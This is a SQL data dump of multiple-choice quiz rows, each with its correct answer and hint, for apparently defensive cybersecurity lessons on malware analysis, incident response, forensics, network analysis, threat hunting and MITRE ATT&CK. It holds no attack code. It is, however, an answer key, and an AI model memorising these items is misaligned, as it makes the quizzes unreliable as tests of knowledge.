(5978, 261, 'What makes a Worm different from a Virus?', 2, 'Worms spread without user interaction', 0, 'Self-replicating', '2025-12-26 22:55:56', '[\"Worms are bigger\", \"Worms spread without user interaction\", \"Viruses are newer\", \"No difference\"]'),
(5979, 261, 'What is \"Fileless Malware\"?', 3, 'Malware that lives in RAM, not on disk', 0, 'Memory-only', '2025-12-26 22:55:56', '[\"Malware with no code\", \"Malware that lives in RAM, not on disk\", \"Malware that is deleted\", \"Malware on USB\"]'),
(5980, 262, 'What is Static Analysis?', 1, 'Examining malware without executing it', 0, 'Not running', '2025-12-26 22:55:56', '[\"Running malware in a sandbox\", \"Examining malware without executing it\", \"Asking the malware questions\", \"Deleting the malware\"]'),
(5981, 262, 'What is a major risk of Dynamic Analysis?', 2, 'Sandbox escape', 0, 'Containment failure', '2025-12-26 22:55:56', '[\"It is too slow\", \"Sandbox escape\", \"It is too expensive\", \"Nothing\"]'),
(5982, 262, 'What tool is commonly used for strings extraction?', 3, 'strings command', 0, 'Text', '2025-12-26 22:55:56', '[\"Wireshark\", \"strings command\", \"Nmap\", \"Burp Suite\"]'),
(5983, 263, 'Why should you use \"Host-Only\" networking for a malware lab?', 1, 'To prevent the malware from reaching the internet', 0, 'Isolation', '2025-12-26 22:55:56', '[\"It is faster\", \"To prevent the malware from reaching the internet\", \"It is default\", \"For gaming\"]');
INSERT INTO `lesson_questions` (`id`, `task_id`, `question_text`, `question_order`, `correct_answer`, `case_sensitive`, `hint`, `created_at`, `options`) VALUES
(5984, 263, 'What is FlareVM?', 2, 'A pre-configured Windows VM for malware analysis', 0, 'Mandiant tool', '2025-12-26 22:55:56', '[\"A virus\", \"A pre-configured Windows VM for malware analysis\", \"A firewall\", \"An antivirus\"]'),
(5985, 263, 'What should you do BEFORE running malware in a VM?', 3, 'Take a snapshot', 0, 'Snapshot', '2025-12-26 22:55:56', '[\"Delete all files\", \"Take a snapshot\", \"Turn off the firewall\", \"Install games\"]'),
(5986, 264, 'What does high entropy (>7.0) in a file suggest?', 1, 'The file is packed or encrypted', 0, 'Obfuscation', '2025-12-26 22:55:56', '[\"It is small\", \"The file is packed or encrypted\", \"It is safe\", \"It is old\"]'),
(5987, 264, 'If a PE file imports \"VirtualAlloc\", what might it be doing?', 2, 'Memory allocation for code injection', 0, 'Injection', '2025-12-26 22:55:56', '[\"Playing music\", \"Memory allocation for code injection\", \"Deleting files\", \"Printing documents\"]'),
(5988, 264, 'Why hash a malware sample before analysis?', 3, 'To check VirusTotal for known info', 0, 'Lookup', '2025-12-26 22:55:56', '[\"To delete it\", \"To check VirusTotal for known info\", \"To run it\", \"To rename it\"]'),
(5989, 265, 'What is Any.Run used for?', 1, 'Interactive malware sandboxing', 0, 'Sandbox', '2025-12-26 22:55:56', '[\"Static analysis\", \"Interactive malware sandboxing\", \"Coding\", \"Email\"]'),
(5990, 265, 'If malware adds a \"Run\" registry key, what is it likely achieving?', 2, 'Persistence (auto-start)', 0, 'Persistence', '2025-12-26 22:55:56', '[\"Deleting files\", \"Persistence (auto-start)\", \"Playing music\", \"Updating\"]'),
(5991, 265, 'How might malware detect it is in a sandbox?', 3, 'Looking for VM artifacts or lack of user activity', 0, 'Evasion', '2025-12-26 22:55:56', '[\"By asking the user\", \"Looking for VM artifacts or lack of user activity\", \"By checking the calendar\", \"By running fast\"]'),
(5992, 266, 'What does IOC stand for?', 1, 'Indicators of Compromise', 0, 'Evidence', '2025-12-26 22:55:56', '[\"Internet of Computers\", \"Indicators of Compromise\", \"Input Output Control\", \"Internal Office Command\"]'),
(5993, 266, 'What is a \"Mutex\" in malware context?', 2, 'A unique name to prevent multiple instances', 0, 'Single instance', '2025-12-26 22:55:56', '[\"A virus type\", \"A unique name to prevent multiple instances\", \"A password\", \"A file extension\"]'),
(5994, 266, 'Which framework maps malware techniques?', 3, 'MITRE ATT&CK', 0, 'Tactics', '2025-12-26 22:55:56', '[\"NIST\", \"MITRE ATT&CK\", \"ISO 27001\", \"PCI DSS\"]'),
(5995, 267, 'Which malware hides deep in the OS to maintain persistent access?', 1, 'Rootkit', 0, 'Hidden', '2025-12-26 22:55:56', '[\"Worm\", \"Trojan\", \"Rootkit\", \"Virus\"]'),
(5996, 267, 'Which attack gives an attacker full remote control?', 2, 'RAT (Remote Access Trojan)', 0, 'Remote', '2025-12-26 22:55:56', '[\"Rootkit\", \"Spyware\", \"RAT (Remote Access Trojan)\", \"Worm\"]'),
(5997, 267, 'Running malware in a sandbox is called:', 3, 'Dynamic Analysis', 0, 'Execute', '2025-12-26 22:55:56', '[\"Static Analysis\", \"Dynamic Analysis\", \"Passive Analysis\", \"Code Review\"]'),
(5998, 267, 'Examining a file without executing it is:', 4, 'Static Analysis', 0, 'Safe', '2025-12-26 22:55:56', '[\"Dynamic Analysis\", \"Static Analysis\", \"Behavioral Analysis\", \"Reverse Engineering\"]'),
(5999, 267, 'What does PEStudio analyze?', 5, 'Windows PE (Executable) files', 0, 'EXE', '2025-12-26 22:55:56', '[\"Linux binaries\", \"Windows PE (Executable) files\", \"Network packets\", \"JSON files\"]'),
(6000, 267, 'If malware \"sleeps\" for a long time, what might it be doing?', 6, 'Evading sandbox analysis', 0, 'Timeout', '2025-12-26 22:55:56', '[\"Updating\", \"Evading sandbox analysis\", \"Nothing suspicious\", \"Downloading updates\"]'),
(6001, 271, 'What does CSIRT stand for?', 1, 'Computer Security Incident Response Team', 0, 'Team', '2025-12-26 23:03:48', '[\"Cyber Security Internal Review Team\", \"Computer Security Incident Response Team\", \"Critical System IR Team\", \"Cloud Security IR Task\"]'),
(6002, 271, 'Why is a documented IR process important?', 2, 'It ensures consistent and fast response', 0, 'Consistency', '2025-12-26 23:03:48', '[\"It looks good\", \"It ensures consistent and fast response\", \"It is optional\", \"It slows things down\"]'),
(6003, 271, 'Which of these is an example of a security incident?', 3, 'Malware infection', 0, 'Breach', '2025-12-26 23:03:48', '[\"Password reset\", \"Malware infection\", \"Software update\", \"New employee onboarding\"]'),
(6004, 272, 'How many phases are in the NIST IR lifecycle?', 1, '4', 0, 'Four', '2025-12-26 23:03:48', '[\"3\", \"4\", \"5\", \"6\"]'),
(6005, 272, 'Which phase comes after \"Detection & Analysis\"?', 2, 'Containment, Eradication & Recovery', 0, 'Next', '2025-12-26 23:03:48', '[\"Preparation\", \"Containment, Eradication & Recovery\", \"Post-Incident\", \"None\"]'),
(6006, 272, 'What happens after \"Lessons Learned\"?', 3, 'Loop back to Preparation (improvement)', 0, 'Cycle', '2025-12-26 23:03:48', '[\"Nothing\", \"Loop back to Preparation (improvement)\", \"Delete everything\", \"Close the case\"]'),
(6007, 273, 'What is a \"Playbook\" in IR context?', 1, 'A step-by-step guide for handling specific incidents', 0, 'Runbook', '2025-12-26 23:03:48', '[\"A video game\", \"A step-by-step guide for handling specific incidents\", \"A backup plan\", \"A training manual\"]'),
(6008, 273, 'What is a \"Jump Bag\"?', 2, 'Pre-packed forensic tools for on-site response', 0, 'Go Bag', '2025-12-26 23:03:48', '[\"A travel bag\", \"Pre-packed forensic tools for on-site response\", \"A backup drive\", \"A parachute\"]'),
(6009, 273, 'Why is \"Baselining\" systems important?', 3, 'To know what normal looks like', 0, 'Comparison', '2025-12-26 23:03:48', '[\"It is not\", \"To know what normal looks like\", \"To delete old files\", \"To upgrade software\"]'),
(6010, 274, 'What is the first step in analysis?', 1, 'Validate if it is a True Positive', 0, 'Confirm', '2025-12-26 23:03:48', '[\"Delete the alert\", \"Validate if it is a True Positive\", \"Call the police\", \"Ignore it\"]'),
(6011, 274, 'What should you start documenting immediately?', 2, 'A timeline of events', 0, 'Timeline', '2025-12-26 23:03:48', '[\"A blog post\", \"A timeline of events\", \"A resignation letter\", \"A shopping list\"]'),
(6012, 274, 'Who might notify you of an incident externally?', 3, 'FBI, vendor, or partner', 0, 'External', '2025-12-26 23:03:48', '[\"The janitor\", \"FBI, vendor, or partner\", \"The intern\", \"Nobody\"]'),
(6013, 275, 'What is \"Short-Term Containment\"?', 1, 'Immediate actions to stop the attack', 0, 'Quick fix', '2025-12-26 23:03:48', '[\"Long-term planning\", \"Immediate actions to stop the attack\", \"Deleting files\", \"Rebooting\"]'),
(6014, 275, 'Why should you NOT shut down a compromised machine immediately?', 2, 'Volatile memory (RAM) evidence is lost', 0, 'Forensics', '2025-12-26 23:03:48', '[\"It is faster\", \"Volatile memory (RAM) evidence is lost\", \"It makes noise\", \"It uses electricity\"]'),
(6015, 275, 'What is a quarantine VLAN used for?', 3, 'Isolating compromised systems while keeping them accessible', 0, 'Isolation', '2025-12-26 23:03:48', '[\"Gaming\", \"Isolating compromised systems while keeping them accessible\", \"Faster internet\", \"Printer sharing\"]'),
(6016, 276, 'What must be removed during Eradication?', 1, 'Malware and persistence mechanisms', 0, 'Cleanup', '2025-12-26 23:03:48', '[\"User files\", \"Malware and persistence mechanisms\", \"Operating system\", \"All software\"]'),
(6017, 276, 'Before reconnecting a recovered system, what should you do?', 2, 'Validate it is clean', 0, 'Verify', '2025-12-26 23:03:48', '[\"Just plug it in\", \"Validate it is clean\", \"Delete everything\", \"Ignore it\"]'),
(6018, 276, 'Why \"gradual reconnection\"?', 3, 'To detect re-infection before spreading', 0, 'Careful', '2025-12-26 23:03:48', '[\"It is slower\", \"To detect re-infection before spreading\", \"To save power\", \"It looks professional\"]'),
(6019, 277, 'When should the Lessons Learned meeting be held?', 1, 'Within 1-2 weeks of incident closure', 0, 'Soon', '2025-12-26 23:03:48', '[\"Never\", \"Within 1-2 weeks of incident closure\", \"After 1 year\", \"During the incident\"]'),
(6020, 277, 'What is the purpose of a Post-Incident Report?', 2, 'Document what happened and recommendations', 0, 'Documentation', '2025-12-26 23:03:48', '[\"To blame someone\", \"Document what happened and recommendations\", \"To close the ticket\", \"To delete logs\"]'),
(6021, 277, 'How do you prevent similar incidents?', 3, 'Update SIEM rules, playbooks, and train staff', 0, 'Improve', '2025-12-26 23:03:48', '[\"Ignore it\", \"Update SIEM rules, playbooks, and train staff\", \"Fire everyone\", \"Do nothing\"]'),
(6022, 278, 'Which framework defines the 4-phase IR lifecycle?', 1, 'NIST SP 800-61', 0, 'Standard', '2025-12-26 23:03:48', '[\"ISO 27001\", \"NIST SP 800-61\", \"PCI DSS\", \"HIPAA\"]'),
(6023, 278, 'What is the first phase of IR?', 2, 'Preparation', 0, 'First', '2025-12-26 23:03:48', '[\"Detection\", \"Preparation\", \"Containment\", \"Recovery\"]'),
(6024, 278, 'Isolating a host from the network is part of which phase?', 3, 'Containment', 0, 'Isolate', '2025-12-26 23:03:48', '[\"Preparation\", \"Detection\", \"Containment\", \"Eradication\"]'),
(6025, 278, 'Why preserve volatile memory (RAM)?', 4, 'It contains forensic evidence lost on shutdown', 0, 'Evidence', '2025-12-26 23:03:48', '[\"It is faster\", \"It contains forensic evidence lost on shutdown\", \"It is pretty\", \"No reason\"]'),
(6026, 278, 'What document guides response to specific incident types?', 5, 'Playbook', 0, 'Runbook', '2025-12-26 23:03:48', '[\"Resume\", \"Playbook\", \"Novel\", \"Menu\"]'),
(6027, 278, 'What happens in the \"Post-Incident\" phase?', 6, 'Lessons Learned and improvement', 0, 'Review', '2025-12-26 23:03:48', '[\"Panic\", \"Lessons Learned and improvement\", \"Vacation\", \"Nothing\"]'),
(6028, 281, 'What is the \"Golden Rule\" of forensics?', 1, 'Preserve the evidence', 0, 'Do not alter', '2025-12-26 23:05:09', '[\"Delete everything\", \"Preserve the evidence\", \"Work fast\", \"Guess the answer\"]'),
(6029, 281, 'Which forensics type focuses on RAM?', 2, 'Memory Forensics', 0, 'Volatile', '2025-12-26 23:05:09', '[\"Disk\", \"Memory Forensics\", \"Network\", \"Mobile\"]'),
(6030, 281, 'Why is forensics used in lawsuits?', 3, 'eDiscovery and litigation support', 0, 'Legal', '2025-12-26 23:05:09', '[\"For fun\", \"eDiscovery and litigation support\", \"To delete evidence\", \"To hack\"]'),
(6031, 282, 'What is the first phase of the forensic process?', 1, 'Identification', 0, 'Find', '2025-12-26 23:05:09', '[\"Analysis\", \"Identification\", \"Presentation\", \"Deletion\"]'),
(6032, 282, 'Which tool is used for free disk imaging?', 2, 'FTK Imager', 0, 'Free', '2025-12-26 23:05:09', '[\"Wireshark\", \"FTK Imager\", \"Nmap\", \"Burp Suite\"]'),
(6033, 282, 'What document tracks who touched the evidence?', 3, 'Chain of Custody', 0, 'Log', '2025-12-26 23:05:09', '[\"Resume\", \"Chain of Custody\", \"Invoice\", \"Email\"]'),
(6034, 283, 'What happens if Chain of Custody is broken?', 1, 'Evidence may be inadmissible in court', 0, 'Thrown out', '2025-12-26 23:05:09', '[\"Nothing\", \"Evidence may be inadmissible in court\", \"Faster trial\", \"Automatic win\"]'),
(6035, 283, 'What does a write blocker do?', 2, 'Allows reading but prevents writing to evidence', 0, 'Read-only', '2025-12-26 23:05:09', '[\"Speeds up the disk\", \"Allows reading but prevents writing to evidence\", \"Encrypts data\", \"Deletes files\"]'),
(6036, 283, 'What should you do before touching evidence?', 3, 'Photograph the scene', 0, 'Document', '2025-12-26 23:05:09', '[\"Delete logs\", \"Photograph the scene\", \"Guess\", \"Nothing\"]'),
(6037, 284, 'Why should you image a disk before analysis?', 1, 'To preserve the original evidence', 0, 'Protect', '2025-12-26 23:05:09', '[\"It is faster\", \"To preserve the original evidence\", \"To delete files\", \"No reason\"]'),
(6038, 284, 'Which acquisition type captures deleted data?', 2, 'Physical Image', 0, 'Complete', '2025-12-26 23:05:09', '[\"Logical\", \"Physical Image\", \"Live\", \"None\"]'),
(6039, 284, 'How do you verify a disk image is accurate?', 3, 'Compare hashes of source and image', 0, 'Hash match', '2025-12-26 23:05:09', '[\"Guess\", \"Compare hashes of source and image\", \"Look at it\", \"Count files\"]'),
(6040, 285, 'What is the MFT in NTFS?', 1, 'Master File Table - database of all files', 0, 'Index', '2025-12-26 23:05:09', '[\"Main Folder Tree\", \"Master File Table - database of all files\", \"Memory File Track\", \"My First Table\"]'),
(6041, 285, 'What can Alternate Data Streams (ADS) be used for?', 2, 'Hiding data attached to files', 0, 'Steganography', '2025-12-26 23:05:09', '[\"Speeding up reads\", \"Hiding data attached to files\", \"Compressing files\", \"Encrypting\"]'),
(6042, 285, 'What is \"Timestomping\"?', 3, 'Modifying timestamps to hide activity', 0, 'Anti-forensics', '2025-12-26 23:05:09', '[\"Creating timestamps\", \"Modifying timestamps to hide activity\", \"Deleting timestamps\", \"Reading timestamps\"]'),
(6043, 286, 'Which registry hive contains user password hashes?', 1, 'SAM', 0, 'Security', '2025-12-26 23:05:09', '[\"SYSTEM\", \"SAM\", \"SOFTWARE\", \"NTUSER\"]'),
(6044, 286, 'What does Prefetch show?', 2, 'Programs that have been executed', 0, 'Execution', '2025-12-26 23:05:09', '[\"Network connections\", \"Programs that have been executed\", \"Passwords\", \"Emails\"]'),
(6045, 286, 'Where are Windows Event Logs stored?', 3, 'C:\\Windows\\System32\\winevt', 0, 'Logs path', '2025-12-26 23:05:09', '[\"Desktop\", \"C:\\\\Windows\\\\System32\\\\winevt\", \"Recycle Bin\", \"Documents\"]'),
(6046, 287, 'What is the golden rule of forensics?', 1, 'Preserve the evidence', 0, 'Protect', '2025-12-26 23:05:09', '[\"Analyze fast\", \"Preserve the evidence\", \"Delete duplicates\", \"Guess\"]'),
(6047, 287, 'Which tool is commonly used for memory forensics?', 2, 'Volatility', 0, 'RAM', '2025-12-26 23:05:09', '[\"FTK Imager\", \"Volatility\", \"Wireshark\", \"Nmap\"]'),
(6048, 287, 'What does a write blocker prevent?', 3, 'Writing to evidence (preserve integrity)', 0, 'Read-only', '2025-12-26 23:05:09', '[\"Reading\", \"Writing to evidence (preserve integrity)\", \"Deleting\", \"Copying\"]'),
(6049, 287, 'Which Windows artifact tracks program execution?', 4, 'Prefetch', 0, 'Execution', '2025-12-26 23:05:09', '[\"SAM\", \"NTUSER\", \"Prefetch\", \"Cookies\"]'),
(6050, 287, 'What file system feature allows hidden data in NTFS?', 5, 'Alternate Data Streams (ADS)', 0, 'Hidden', '2025-12-26 23:05:09', '[\"MFT\", \"Alternate Data Streams (ADS)\", \"Journal\", \"Inodes\"]'),
(6051, 287, 'What is the purpose of hashing a disk image?', 6, 'Verify image integrity', 0, 'Verification', '2025-12-26 23:05:09', '[\"Compress it\", \"Verify image integrity\", \"Encrypt it\", \"Delete it\"]'),
(6052, 291, 'What does NTA stand for?', 1, 'Network Traffic Analysis', 0, 'NTA', '2025-12-26 23:06:44', '[\"Network Threat Assessment\", \"Network Traffic Analysis\", \"New Technology Application\", \"None\"]'),
(6053, 291, 'What limits your ability to see packet content?', 2, 'Encryption (TLS)', 0, 'Hidden', '2025-12-26 23:06:44', '[\"Speed\", \"Encryption (TLS)\", \"Color\", \"Size\"]'),
(6054, 291, 'What can you determine from packet headers?', 3, 'Source/Destination IPs and ports', 0, 'Metadata', '2025-12-26 23:06:44', '[\"File contents\", \"Source/Destination IPs and ports\", \"Passwords\", \"Nothing\"]'),
(6055, 292, 'What is a SPAN port?', 1, 'A switch port that mirrors traffic for monitoring', 0, 'Mirror', '2025-12-26 23:06:44', '[\"A special cable\", \"A switch port that mirrors traffic for monitoring\", \"A firewall rule\", \"An IP address\"]'),
(6056, 292, 'What file format stores captured packets?', 2, 'PCAP', 0, 'Packet file', '2025-12-26 23:06:44', '[\"PDF\", \"PCAP\", \"DOCX\", \"MP4\"]'),
(6057, 292, 'Which tool is a GUI for packet analysis?', 3, 'Wireshark', 0, 'GUI', '2025-12-26 23:06:44', '[\"tcpdump\", \"Wireshark\", \"grep\", \"nmap\"]'),
(6058, 293, 'What Wireshark feature reconstructs a conversation?', 1, 'Follow TCP Stream', 0, 'Conversation', '2025-12-26 23:06:44', '[\"Export\", \"Follow TCP Stream\", \"Filter\", \"Capture\"]'),
(6059, 293, 'What is a \"Display Filter\" used for?', 2, 'Showing only relevant packets', 0, 'Focus', '2025-12-26 23:06:44', '[\"Capturing packets\", \"Showing only relevant packets\", \"Deleting packets\", \"Encrypting packets\"]'),
(6060, 293, 'Which filter shows only DNS traffic?', 3, 'dns', 0, 'Protocol', '2025-12-26 23:06:44', '[\"tcp\", \"udp\", \"dns\", \"http\"]'),
(6061, 294, 'What is the first step of the TCP handshake?', 1, 'SYN', 0, 'Start', '2025-12-26 23:06:44', '[\"ACK\", \"FIN\", \"SYN\", \"RST\"]'),
(6062, 294, 'How can you extract files from HTTP traffic in Wireshark?', 2, 'Export Objects > HTTP', 0, 'File extraction', '2025-12-26 23:06:44', '[\"Copy paste\", \"Export Objects > HTTP\", \"Print\", \"Screenshot\"]'),
(6063, 294, 'What might a very long User-Agent string indicate?', 3, 'Buffer overflow attempt', 0, 'Attack', '2025-12-26 23:06:44', '[\"Normal traffic\", \"Buffer overflow attempt\", \"Slow browser\", \"Mobile device\"]'),
(6064, 295, 'What is \"Beaconing\"?', 1, 'Regular, timed connections to a C2 server', 0, 'Heartbeat', '2025-12-26 23:06:44', '[\"Random traffic\", \"Regular, timed connections to a C2 server\", \"Fast traffic\", \"Encrypted traffic\"]'),
(6065, 295, 'Why is port 4444 suspicious?', 2, 'Default Metasploit/Meterpreter port', 0, 'Known bad', '2025-12-26 23:06:44', '[\"It is slow\", \"Default Metasploit/Meterpreter port\", \"It is encrypted\", \"It is common\"]'),
(6066, 295, 'What does DGA stand for?', 3, 'Domain Generation Algorithm', 0, 'Random domains', '2025-12-26 23:06:44', '[\"Data Gathering API\", \"Domain Generation Algorithm\", \"Dynamic Gateway Access\", \"Direct Gateway Address\"]'),
(6067, 296, 'What was Zeek formerly known as?', 1, 'Bro', 0, 'Old name', '2025-12-26 23:06:44', '[\"Wireshark\", \"Bro\", \"tcpdump\", \"Snort\"]'),
(6068, 296, 'Which Zeek log tracks all network connections?', 2, 'conn.log', 0, 'Connections', '2025-12-26 23:06:44', '[\"http.log\", \"dns.log\", \"conn.log\", \"ssl.log\"]'),
(6069, 296, 'How is Zeek different from Wireshark?', 3, 'Zeek generates structured logs, better for automation', 0, 'Logs', '2025-12-26 23:06:44', '[\"Zeek has GUI\", \"Zeek generates structured logs, better for automation\", \"Zeek is slower\", \"No difference\"]'),
(6070, 297, 'What tool is used for command-line packet capture on Linux?', 1, 'tcpdump', 0, 'CLI', '2025-12-26 23:06:44', '[\"Wireshark\", \"tcpdump\", \"Nmap\", \"Netcat\"]'),
(6071, 297, 'Which Wireshark filter shows HTTP requests?', 2, 'http.request', 0, 'HTTP', '2025-12-26 23:06:44', '[\"tcp.port\", \"http.request\", \"dns\", \"frame\"]'),
(6072, 297, 'What is the TCP handshake sequence?', 3, 'SYN, SYN-ACK, ACK', 0, 'Three-way', '2025-12-26 23:06:44', '[\"ACK, SYN, FIN\", \"SYN, SYN-ACK, ACK\", \"FIN, ACK, RST\", \"None\"]'),
(6073, 297, 'What does beaconing traffic indicate?', 4, 'Possible C2 communication', 0, 'Malware', '2025-12-26 23:06:44', '[\"Normal browsing\", \"Possible C2 communication\", \"File download\", \"Email\"]'),
(6074, 297, 'Which Zeek log tracks DNS queries?', 5, 'dns.log', 0, 'DNS', '2025-12-26 23:06:44', '[\"conn.log\", \"http.log\", \"dns.log\", \"files.log\"]'),
(6075, 297, 'What file format stores captured packets?', 6, 'PCAP', 0, 'Capture', '2025-12-26 23:06:44', '[\"CSV\", \"PCAP\", \"JSON\", \"XML\"]'),
(6076, 301, 'What is the difference between SOC and Threat Hunting?', 1, 'SOC reacts to alerts; Hunting proactively searches', 0, 'Proactive', '2025-12-26 23:08:10', '[\"No difference\", \"SOC reacts to alerts; Hunting proactively searches\", \"Hunting is automated\", \"SOC is proactive\"]'),
(6077, 301, 'What is \"Dwell Time\"?', 2, 'Time an attacker stays undetected in the network', 0, 'Hidden', '2025-12-26 23:08:10', '[\"Time to read alerts\", \"Time an attacker stays undetected in the network\", \"Shift duration\", \"Lunch break\"]'),
(6078, 301, 'Why are APTs hard to detect?', 3, 'They specifically evade automated detection', 0, 'Stealth', '2025-12-26 23:08:10', '[\"They are slow\", \"They specifically evade automated detection\", \"They use email\", \"They are loud\"]'),
(6079, 302, 'Detection relies on what?', 1, 'Pre-defined rules/signatures', 0, 'Rules', '2025-12-26 23:08:10', '[\"Guessing\", \"Pre-defined rules/signatures\", \"Luck\", \"Magic\"]'),
(6080, 302, 'What should happen after a successful hunt?', 2, 'Create a detection rule for future attacks', 0, 'Automate', '2025-12-26 23:08:10', '[\"Delete logs\", \"Create a detection rule for future attacks\", \"Ignore it\", \"Take vacation\"]'),
(6081, 302, 'At HMM Level 3, hunts are:', 3, 'Proactive and hypothesis-driven', 0, 'Mature', '2025-12-26 23:08:10', '[\"Nonexistent\", \"Random\", \"Proactive and hypothesis-driven\", \"Fully automated\"]'),
(6082, 303, 'What is the first step of the Hunting Loop?', 1, 'Form a Hypothesis', 0, 'Start', '2025-12-26 23:08:10', '[\"Collect data\", \"Form a Hypothesis\", \"Report\", \"Delete logs\"]'),
(6083, 303, 'If a hunt finds nothing malicious, was it wasted?', 2, 'No, you learned what normal looks like', 0, 'Value', '2025-12-26 23:08:10', '[\"Yes\", \"No, you learned what normal looks like\", \"Maybe\", \"Always\"]'),
(6084, 303, 'What should happen after a hunt?', 3, 'Document findings and create detections', 0, 'Improve', '2025-12-26 23:08:10', '[\"Delete evidence\", \"Document findings and create detections\", \"Forget it\", \"Nothing\"]'),
(6085, 304, 'What makes a good hunting hypothesis?', 1, 'Specific, actionable, based on threat intel', 0, 'Focused', '2025-12-26 23:08:10', '[\"Vague and broad\", \"Specific, actionable, based on threat intel\", \"Random\", \"Long\"]'),
(6086, 304, 'Which framework maps attacker techniques?', 2, 'MITRE ATT&CK', 0, 'Framework', '2025-12-26 23:08:10', '[\"NIST\", \"MITRE ATT&CK\", \"ISO 27001\", \"PCI DSS\"]'),
(6087, 304, 'What is a bad hypothesis?', 3, 'Something bad might happen (too vague)', 0, 'Unfocused', '2025-12-26 23:08:10', '[\"Attackers use PowerShell\", \"Something bad might happen (too vague)\", \"DNS tunneling exists\", \"Phishing leads to C2\"]'),
(6088, 305, 'Which data source shows process command lines?', 1, 'EDR', 0, 'Endpoint', '2025-12-26 23:08:10', '[\"Firewall\", \"EDR\", \"DNS\", \"Proxy\"]'),
(6089, 305, 'What is important about log retention?', 2, 'Determines how far back you can hunt', 0, 'History', '2025-12-26 23:08:10', '[\"It is not important\", \"Determines how far back you can hunt\", \"Makes logs colorful\", \"Speeds up queries\"]'),
(6090, 305, 'What tool enhances Windows logging for hunting?', 3, 'Sysmon', 0, 'Windows', '2025-12-26 23:08:10', '[\"Wireshark\", \"Sysmon\", \"Nmap\", \"Burp Suite\"]'),
(6091, 306, 'What does \"Long Tail Analysis\" focus on?', 1, 'Rare occurrences (outliers)', 0, 'Unusual', '2025-12-26 23:08:10', '[\"Common events\", \"Rare occurrences (outliers)\", \"Fast events\", \"Old events\"]'),
(6092, 306, 'In \"Stack Counting\", what is suspicious?', 2, 'Values that appear very rarely', 0, 'Rare', '2025-12-26 23:08:10', '[\"Values that appear often\", \"Values that appear very rarely\", \"All values\", \"No values\"]'),
(6093, 306, 'What is \"Pivoting\" in hunting?', 3, 'Moving from one indicator to related data', 0, 'Connect', '2025-12-26 23:08:10', '[\"Rotating chairs\", \"Moving from one indicator to related data\", \"Deleting logs\", \"Blocking IPs\"]'),
(6094, 307, 'Threat Hunting is:', 1, 'Proactive search for undetected threats', 0, 'Hunt', '2025-12-26 23:08:10', '[\"Waiting for alerts\", \"Proactive search for undetected threats\", \"Deleting logs\", \"Writing reports\"]'),
(6095, 307, 'What is \"Dwell Time\"?', 2, 'Time attacker remains undetected', 0, 'Hidden', '2025-12-26 23:08:10', '[\"Time to lunch\", \"Time attacker remains undetected\", \"Shift length\", \"Meeting time\"]'),
(6096, 307, 'A good hypothesis is:', 3, 'Specific and actionable', 0, 'Focused', '2025-12-26 23:08:10', '[\"Vague\", \"Specific and actionable\", \"Random\", \"Long\"]'),
(6097, 307, 'What framework maps adversary techniques?', 4, 'MITRE ATT&CK', 0, 'Matrix', '2025-12-26 23:08:10', '[\"NIST\", \"MITRE ATT&CK\", \"ISO\", \"PCI\"]'),
(6098, 307, 'Long Tail Analysis focuses on:', 5, 'Rare occurrences', 0, 'Outliers', '2025-12-26 23:08:10', '[\"Common events\", \"Rare occurrences\", \"Fast events\", \"All events\"]'),
(6099, 307, 'After finding a threat, you should:', 6, 'Create a detection rule', 0, 'Automate', '2025-12-26 23:08:10', '[\"Delete it\", \"Create a detection rule\", \"Ignore it\", \"Hide it\"]'),
(6100, 311, 'What does MITRE ATT&CK provide?', 1, 'Knowledge base of adversary tactics and techniques', 0, 'Framework', '2025-12-26 23:09:24', '[\"A firewall\", \"Knowledge base of adversary tactics and techniques\", \"An antivirus\", \"A SIEM\"]'),
(6101, 311, 'What does a \"Tactic\" represent?', 2, 'The adversary\'s goal', 0, 'Why', '2025-12-26 23:09:24', '[\"A specific tool\", \"The adversary\'s goal\", \"A CVE\", \"A patch\"]'),
(6102, 311, 'Which matrix covers Windows, Linux, macOS?', 3, 'Enterprise', 0, 'Main', '2025-12-26 23:09:24', '[\"Mobile\", \"Enterprise\", \"ICS\", \"Cloud\"]'),
(6103, 312, 'How many Enterprise tactics are there?', 1, '14', 0, 'Fourteen', '2025-12-26 23:09:24', '[\"10\", \"12\", \"14\", \"20\"]'),
(6104, 312, 'Which tactic involves stealing passwords?', 2, 'Credential Access', 0, 'Passwords', '2025-12-26 23:09:24', '[\"Execution\", \"Credential Access\", \"Discovery\", \"Impact\"]'),
(6105, 312, 'Which tactic is about maintaining access after initial compromise?', 3, 'Persistence', 0, 'Stay', '2025-12-26 23:09:24', '[\"Initial Access\", \"Persistence\", \"Exfiltration\", \"Collection\"]'),
(6106, 313, 'What is a \"Sub-Technique\"?', 1, 'A more specific method under a main technique', 0, 'Specific', '2025-12-26 23:09:24', '[\"A different framework\", \"A more specific method under a main technique\", \"A tool\", \"A tactic\"]'),
(6107, 313, 'T1059.001 refers to:', 2, 'PowerShell execution', 0, 'Script', '2025-12-26 23:09:24', '[\"Registry\", \"PowerShell execution\", \"DNS\", \"HTTP\"]'),
(6108, 313, 'What is a \"Procedure\" in ATT&CK?', 3, 'Real-world example of technique usage', 0, 'Example', '2025-12-26 23:09:24', '[\"A tactic\", \"Real-world example of technique usage\", \"A sub-technique\", \"A detection rule\"]'),
(6109, 314, 'What tool visualizes ATT&CK coverage?', 1, 'ATT&CK Navigator', 0, 'Tool', '2025-12-26 23:09:24', '[\"Wireshark\", \"ATT&CK Navigator\", \"Nmap\", \"Burp Suite\"]'),
(6110, 314, 'In the matrix, columns represent:', 2, 'Tactics', 0, 'Goals', '2025-12-26 23:09:24', '[\"Techniques\", \"Tactics\", \"Procedures\", \"Tools\"]'),
(6111, 314, 'What format provides machine-readable ATT&CK data?', 3, 'STIX', 0, 'Standard', '2025-12-26 23:09:24', '[\"PDF\", \"STIX\", \"CSV\", \"DOCX\"]'),
(6112, 315, 'How can ATT&CK help evaluate a security product?', 1, 'Check if it detects specific techniques', 0, 'Evaluation', '2025-12-26 23:09:24', '[\"By price\", \"Check if it detects specific techniques\", \"By color\", \"By name\"]'),
(6113, 315, 'What is \"Gap Analysis\" in ATT&CK context?', 2, 'Identifying techniques you cannot detect', 0, 'Missing', '2025-12-26 23:09:24', '[\"Finding bugs\", \"Identifying techniques you cannot detect\", \"Deleting logs\", \"Writing reports\"]'),
(6114, 315, 'Threat-Informed Defense means:', 3, 'Building defenses based on likely threat actors', 0, 'Focused', '2025-12-26 23:09:24', '[\"Random defenses\", \"Building defenses based on likely threat actors\", \"No defenses\", \"Old defenses\"]'),
